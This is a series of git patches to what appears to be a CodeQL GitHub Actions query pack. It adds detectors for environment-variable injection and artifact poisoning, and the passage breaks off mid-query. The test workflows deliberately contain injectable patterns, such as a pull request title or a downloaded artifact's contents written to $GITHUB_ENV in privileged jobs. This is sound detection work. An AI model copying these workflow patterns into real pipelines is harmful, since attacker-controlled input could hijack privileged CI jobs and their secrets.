.github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | From 822e9bcaab1357c734654d200790bab4b2175bc8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 23 Mar 2024 21:55:49 +0100 Subject: [PATCH 137/707] env var injection query --- .../actions/security/EnvVarInjectionQuery.qll | 36 +++++++++ ql/src/Security/CWE-077/EnvVarInjection.ql | 23 ++++++ .../CWE-077/PrivilegedEnvVarInjection.ql | 26 +++++++ .../CWE-077/.github/workflows/test1.yml | 25 +++++++ .../CWE-077/.github/workflows/test2.yml | 73 +++++++++++++++++++ .../CWE-077/.github/workflows/test3.yml | 64 ++++++++++++++++ .../Security/CWE-077/EnvVarInjection.qlref | 1 + .../CWE-077/PrivilegedEnvVarInjection.qlref | 1 + .../CWE-094/.github/workflows/inter-job0.yml | 4 +- 9 files changed, 251 insertions(+), 2 deletions(-) create mode 100644 ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll create mode 100644 ql/src/Security/CWE-077/EnvVarInjection.ql create mode 100644 ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml create mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll new file mode 100644 index 000000000000..dbae3f48f800 --- /dev/null +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -0,0 +1,36 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.DataFlow + +predicate writeToGithubEnvSink(DataFlow::Node sink) { + exists(Expression expr, Run run, string script, string line, string value | + script = run.getScript() and + line = script.splitAt("\n") and + value = line.regexpCapture("echo\\s+.*\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and + expr = sink.asExpr() and + run.getAnScriptExpr() = expr and + value.indexOf(expr.getRawExpression()) > 0 + ) +} + +private class EnvVarInjectionSink extends DataFlow::Node { + EnvVarInjectionSink() { + writeToGithubEnvSink(this) or + externallyDefinedSink(this, "envvar-injection") + } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate an environment variable. + */ +private module EnvVarInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof EnvVarInjectionSink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate an environment variable. */ +module EnvVarInjectionFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql new file mode 100644 index 000000000000..2e978ad9e53f --- /dev/null +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql @@ -0,0 +1,23 @@ +/** + * @name Enviroment Variable built from user-controlled sources + * @description Building an environment variable from user-controlled sources may alter the execution of following system commands + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/envvar-injection + * @tags actions + * security + * external/cwe/cwe-077 + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.EnvVarInjectionQuery +import EnvVarInjectionFlow::PathGraph + +from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink +where EnvVarInjectionFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential environment variable injection in $@, which may be controlled by an external user.", + sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql new file mode 100644 index 000000000000..bce9494a43f2 --- /dev/null +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -0,0 +1,26 @@ +/** + * @name Enviroment Variable built from user-controlled sources + * @description Building an environment variable from user-controlled sources may alter the execution of following system commands + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/privileged-envvar-injection + * @tags actions + * security + * external/cwe/cwe-077 + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.EnvVarInjectionQuery +import EnvVarInjectionFlow::PathGraph + +from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, Workflow w +where + EnvVarInjectionFlow::flowPath(source, sink) and + w = source.getNode().asExpr().getEnclosingWorkflow() and + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) +select sink.getNode(), source, sink, + "Potential privileged environment variable injection in $@, which may be controlled by an external user.", + sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml new file mode 100644 index 000000000000..b2780d54c045 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml @@ -0,0 +1,25 @@ +name: Pull Request Open + +on: + pull_request_target: + branches: + - main + - 14.0.x + + types: + - opened + - reopened + +jobs: + updateJira: + if: github.actor != 'dependabot[bot]' + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - name: Extract Jira Key + run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + + + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml new file mode 100644 index 000000000000..e71178c4ad66 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml @@ -0,0 +1,73 @@ +# https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0 +# https://github.com/firebase/friendlyeats-web/commit/df65aefd24cf6f092a27a5576067ff9f29aa2ef1 +name: Deploy Preview +on: + workflow_run: + workflows: ["Generate Preview"] + types: + - completed + +jobs: + deploy: + runs-on: ubuntu-latest + if: > + ${{ github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' }} + steps: + - name: 'Download artifact' + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{ github.event.workflow_run.id }}, + }); + var matchPrArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr" + })[0]; + var matchPreviewArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "preview" + })[0]; + var downloadPr = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchPrArtifact.id, + archive_format: 'zip', + }); + var downloadPreview = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchPreviewArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data)); + fs.writeFileSync('${{github.workspace}}/firestore-web.zip', Buffer.from(downloadPreview.data)); + - run: | + unzip pr.zip + echo "pr_number=$(cat NR)" >> $GITHUB_ENV + mkdir firestore-web + unzip firestore-web.zip -d firestore-web + - name: Deploy preview + id: deploy_preview + uses: FirebaseExtended/action-hosting-deploy@v0 + with: + repoToken: '${{ secrets.GITHUB_TOKEN }}' + firebaseServiceAccount: '${{ secrets.FIREBASE_SERVICE_ACCOUNT_FIR_CODELABS_89252 }}' + projectId: fir-codelabs-89252 + entryPoint: firestore-web + channelId: firestore-web-${{ env.pr_number }} + env: + FIREBASE_CLI_PREVIEWS: hostingchannels + - name: Write Comment + uses: actions/github-script@v3 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + await github.issues.createComment({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: ${{ env.pr_number }}, + body: 'View preview ${{ steps.deploy_preview.outputs.details_url }}' + }); diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml new file mode 100644 index 000000000000..2f76d4a3042a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml @@ -0,0 +1,64 @@ +# https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project +# https://github.com/google/orbit/commit/6cd71a3f1eec098d0de61bf9bb742737cb3aa5fa +name: report-checks +on: + workflow_run: + workflows: ['checks'] + types: + - completed +permissions: read-all +jobs: + + report-clang-tidy-diff: + permissions: + pull-requests: write + runs-on: ubuntu-latest + steps: + - name: Download PR metadata + uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + workflow_conclusion: '' + name: pr_metadata + if_no_artifact_found: 'ignore' + - name: Download clang_tidy_fixes + uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + workflow_conclusion: '' + name: clang_tidy_fixes + if_no_artifact_found: 'ignore' + - name: Set found_files + id: set_found_files + run: | + if [ -f clang-tidy-fixes.yml ] && [ -f pr_number.txt ] && [ -f pr_head_repo.txt ] && [ -f pr_head_ref.txt ]; then + echo "found_files=true" >> $GITHUB_OUTPUT + else + echo "found_files=false" >> $GITHUB_OUTPUT + fi + - run: | + echo "PR_NUMBER=$(cat pr_number.txt | jq -r .)" >> $GITHUB_ENV + echo "PR_HEAD_REPO=$(cat pr_head_repo.txt | jq -Rr .)" >> $GITHUB_ENV + echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV + if: steps.set_found_files.outputs.found_files == 'true' + - uses: actions/checkout@v3 + if: steps.set_found_files.outputs.found_files == 'true' + with: + repository: ${{ env.PR_HEAD_REPO }} + ref: ${{ env.PR_HEAD_REF }} + persist-credentials: false + - name: Redownload clang_tidy_fixes + if: steps.set_found_files.outputs.found_files == 'true' + uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + workflow_conclusion: '' + name: clang_tidy_fixes + if_no_artifact_found: 'ignore' + - uses: platisd/clang-tidy-pr-comments@89ea1b828cdac1a6ec993d225972adea3b8841b6 + if: steps.set_found_files.outputs.found_files == 'true' + with: + github_token: ${{ secrets.ORBITPROFILER_BOT_PAT }} + clang_tidy_fixes: clang-tidy-fixes.yml + pull_request_id: ${{ env.PR_NUMBER }} + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref new file mode 100644 index 000000000000..dafc2b38fc46 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvVarInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref new file mode 100644 index 000000000000..4562004b9904 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref @@ -0,0 +1 @@ +Security/CWE-077/PrivilegedEnvVarInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml index 5ad00b17db93..d656fb65ea51 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml @@ -1,4 +1,4 @@ -jn: push +on: push jobs: job0: @@ -36,7 +36,7 @@ jobs: if: ${{ always() }} - needs: job1 + needs: job steps: - id: sink From bdfd46111fb7823a61113045af6bda60031748bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Apr 2024 10:51:26 +0200 Subject: [PATCH 138/707] Only triggered on non-pull_request events --- ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index bce9494a43f2..6508b4586292 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -16,11 +16,16 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph +predicate isSingleTriggerWorkflow(Workflow w, string trigger) { + w.getATriggerEvent() = trigger and + count(string t | w.getATriggerEvent() = t | t) = 1 +} + from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, Workflow w where EnvVarInjectionFlow::flowPath(source, sink) and w = source.getNode().asExpr().getEnclosingWorkflow() and - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + not isSingleTriggerWorkflow(w, "pull_request") select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From 9807cf87d52df816ec38ba35833687b4abf6ef12 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Apr 2024 10:52:46 +0200 Subject: [PATCH 139/707] resolve conflicts --- ql/lib/ext/trilom_file-changes-action.model.yml | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 ql/lib/ext/trilom_file-changes-action.model.yml diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml new file mode 100644 index 000000000000..db3d37597827 --- /dev/null +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + # https://github.com/trilom/file-changes-action + # if `prNumber` is provided, the trigger event dont need to be `pull_request_target` + - ["trilom/file-changes-action", "*", "output.files", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_added", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_modified", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_removed", "*", "PR changed files"] From cc16318a9062fd05027fe4827d25bd9d84b0c7e3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Apr 2024 10:56:03 +0200 Subject: [PATCH 140/707] Make new trilom source compliant with new sources --- ql/lib/ext/trilom_file-changes-action.model.yml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml index db3d37597827..77706e266fed 100644 --- a/ql/lib/ext/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -3,9 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - # https://github.com/trilom/file-changes-action - # if `prNumber` is provided, the trigger event dont need to be `pull_request_target` - - ["trilom/file-changes-action", "*", "output.files", "*", "PR changed files"] - - ["trilom/file-changes-action", "*", "output.files_added", "*", "PR changed files"] - - ["trilom/file-changes-action", "*", "output.files_modified", "*", "PR changed files"] - - ["trilom/file-changes-action", "*", "output.files_removed", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_added", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_modified", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_removed", "PR changed files"] From 152d29da3859d054b46eb09f17a17b849fa79cd9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Apr 2024 18:53:37 +0200 Subject: [PATCH 141/707] Add Artifact poisoning and Env Injection queries --- ql/lib/codeql/actions/Ast.qll | 6 ++- ql/lib/codeql/actions/ast/internal/Ast.qll | 26 ++++++---- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 10 ++-- .../dataflow/internal/DataFlowPrivate.qll | 20 +++++++- .../security/ArtifactPoisoningQuery.qll | 50 +++++++++++++++++++ .../actions/security/EnvVarInjectionQuery.qll | 11 ++-- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 26 ++++++++++ ql/src/Security/CWE-829/UntrustedCheckout.ql | 2 +- .../CWE-077/.github/workflows/test1.yml | 2 + .../Security/CWE-077/EnvVarInjection.expected | 6 +++ .../PrivilegedEnvVarInjection.expected | 6 +++ .../CWE-094/.github/workflows/inter-job0.yml | 2 +- .../CWE-094/.github/workflows/test1.yml | 27 ++++++++++ .../Security/CWE-094/CodeInjection.expected | 6 +++ .../CWE-094/PrivilegedCodeInjection.expected | 6 +++ .../.github/workflows/artifactpoisoning1.yml | 34 +++++++++++++ .../.github/workflows/artifactpoisoning2.yml | 21 ++++++++ .../.github/workflows/artifactpoisoning3.yml | 19 +++++++ .../.github/workflows/artifactpoisoning4.yml | 25 ++++++++++ .../CWE-829/.github/workflows/test1.yml | 27 ++++++++++ .../CWE-829/ArtifactPoisoning.expected | 4 ++ .../Security/CWE-829/ArtifactPoisoning.qlref | 2 + .../CWE-829/UnpinnedActionsTag.expected | 1 + 23 files changed, 313 insertions(+), 26 deletions(-) create mode 100644 ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll create mode 100644 ql/src/Security/CWE-829/ArtifactPoisoning.ql create mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index ecc0ad16f5f4..d865eb54905b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -38,7 +38,9 @@ class AstNode instanceof AstNodeImpl { Expression getInScopeEnvVarExpr(string name) { result = super.getInScopeEnvVarExpr(name) } } -class ScalarValue extends AstNode instanceof ScalarValueImpl { } +class ScalarValue extends AstNode instanceof ScalarValueImpl { + string getValue() { result = super.getValue() } +} class Expression extends AstNode instanceof ExpressionImpl { string expression; @@ -218,6 +220,8 @@ abstract class Uses extends AstNode instanceof UsesImpl { string getVersion() { result = super.getVersion() } + string getArgument(string argName) { result = super.getArgument(argName) } + Expression getArgumentExpr(string argName) { result = super.getArgumentExpr(argName) } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 3fa1769e762d..a1470a41dd0f 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -128,6 +128,8 @@ class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { override Location getLocation() { result = value.getLocation() } override YamlScalar getNode() { result = value } + + string getValue() { result = value.getValue() } } class ExpressionImpl extends AstNodeImpl, TExpressionNode { @@ -687,7 +689,19 @@ abstract class UsesImpl extends AstNodeImpl { abstract string getVersion(); - abstract ExpressionImpl getArgumentExpr(string key); + /** Gets the argument expression for the given key. */ + string getArgument(string key) { + exists(ScalarValueImpl scalar | + scalar.getNode() = this.getNode().(YamlMapping).lookup("with").(YamlMapping).lookup(key) and + result = scalar.getValue() + ) + } + + /** Gets the argument expression for the given key (if it exists). */ + ExpressionImpl getArgumentExpr(string key) { + result.getParentNode().getNode() = + this.getNode().(YamlMapping).lookup("with").(YamlMapping).lookup(key) + } } /** @@ -719,11 +733,6 @@ class UsesStepImpl extends StepImpl, UsesImpl { /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } - /** Gets the argument expression for the given key. */ - override ExpressionImpl getArgumentExpr(string key) { - result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) - } - override string toString() { if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" } @@ -763,11 +772,6 @@ class ExternalJobImpl extends JobImpl, UsesImpl { else none() ) } - - /** Gets the argument expression for the given key. */ - override ExpressionImpl getArgumentExpr(string key) { - result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) - } } class RunImpl extends StepImpl { diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index c10334436aa7..343578168127 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -33,12 +33,12 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" */ -predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run r, string varName, string output | +predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(Run run, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and - r.getInScopeEnvVarExpr(varName) = pred.asExpr() and + run.getInScopeEnvVarExpr(varName) = pred.asExpr() and exists(string script, string line | - script = r.getScript() and + script = run.getScript() and line = script.splitAt("\n") and ( output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or @@ -46,6 +46,6 @@ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, Data ) and line.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and - succ.asExpr() = r + succ.asExpr() = run ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 11b8bf94bca5..b5123069f134 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -232,8 +232,24 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( - externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or + externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) + or astTo.getTarget() = astFrom + or + // e.g: + // - run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + // - run: echo ${{ env.ISSUE_KEY }} + exists(Run run, string script, Expression expr, string line, string key, string value | + run.getScript() = script and + run.getAnScriptExpr() = expr and + line = script.splitAt("\n") and + key = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and + value = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 2) and + value.indexOf(expr.getRawExpression()) > 0 and + key = astTo.getFieldName() and + expr = astFrom and + expr.getEnclosingWorkflow() = run.getEnclosingWorkflow() + ) ) ) } @@ -312,7 +328,7 @@ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { predicate storeStep(Node node1, ContentSet c, Node node2) { fieldStoreStep(node1, node2, c) or externallyDefinedStoreStep(node1, node2, c) or - runEnvToScriptStoreStep(node1, node2, c) + envToOutputStoreStep(node1, node2, c) } /** diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll new file mode 100644 index 000000000000..abf36fd7da34 --- /dev/null +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -0,0 +1,50 @@ +import actions + +class ArtifactDownloadStep extends Step { + ArtifactDownloadStep() { + // eg: - uses: dawidd6/action-download-artifact@v2 + this.(UsesStep).getCallee() = "dawidd6/action-download-artifact" and + // exclude downloads outside the current directory + // TODO: add more checks to make sure the artifacts can be controlled + not exists(this.(UsesStep).getArgumentExpr("path")) + or + // eg: + // - uses: actions/github-script@v6 + // with: + // script: | + // let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + // owner: context.repo.owner, + // repo: context.repo.repo, + // run_id: context.payload.workflow_run.id, + // }); + // let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + // return artifact.name == "" + // })[0]; + // let download = await github.rest.actions.downloadArtifact({ + // owner: context.repo.owner, + // repo: context.repo.repo, + // artifact_id: matchArtifact.id, + // archive_format: 'zip', + // }); + this.(UsesStep).getCallee() = "actions/github-script" and + exists(string script | + this.(UsesStep).getArgument("script") = script and + script.matches("%listWorkflowRunArtifacts(%") and + script.matches("%downloadArtifact(%") + ) + or + // eg: - run: gh run download "${WORKFLOW_RUN_ID}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + this.(Run).getScript().splitAt("\n").regexpMatch(".*gh\\s+run\\s+download.*") + or + // eg: + // run: | + // artifacts_url=${{ github.event.workflow_run.artifacts_url }} + // gh api "$artifacts_url" -q '.artifacts[] | [.name, .archive_download_url] | @tsv' | while read artifact + // do + // IFS=$'\t' read name url <<< "$artifact" + // gh api $url > "$name.zip" + // unzip -d "$name" "$name.zip" + // done + this.(Run).getScript().splitAt("\n").matches("%github.event.workflow_run.artifacts_url%") + } +} diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index dbae3f48f800..330920852c1e 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -4,12 +4,13 @@ private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources import codeql.actions.DataFlow -predicate writeToGithubEnvSink(DataFlow::Node sink) { - exists(Expression expr, Run run, string script, string line, string value | +predicate writeToGithubEnvSink(DataFlow::Node exprNode, string key, string value) { + exists(Expression expr, Run run, string script, string line | script = run.getScript() and line = script.splitAt("\n") and - value = line.regexpCapture("echo\\s+.*\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and - expr = sink.asExpr() and + key = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and + value = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 2) and + expr = exprNode.asExpr() and run.getAnScriptExpr() = expr and value.indexOf(expr.getRawExpression()) > 0 ) @@ -17,7 +18,7 @@ predicate writeToGithubEnvSink(DataFlow::Node sink) { private class EnvVarInjectionSink extends DataFlow::Node { EnvVarInjectionSink() { - writeToGithubEnvSink(this) or + writeToGithubEnvSink(this, _, _) or externallyDefinedSink(this, "envvar-injection") } } diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql new file mode 100644 index 000000000000..5b0c4fc4e69b --- /dev/null +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -0,0 +1,26 @@ +/** + * @name Artifact poisoning + * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. + * @kind problem + * @problem.severity warning + * @precision medium + * @security-severity 9.3 + * @id actions/artifact-poisoning + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.ArtifactPoisoningQuery + +from LocalJob job, ArtifactDownloadStep download, Step run +where + 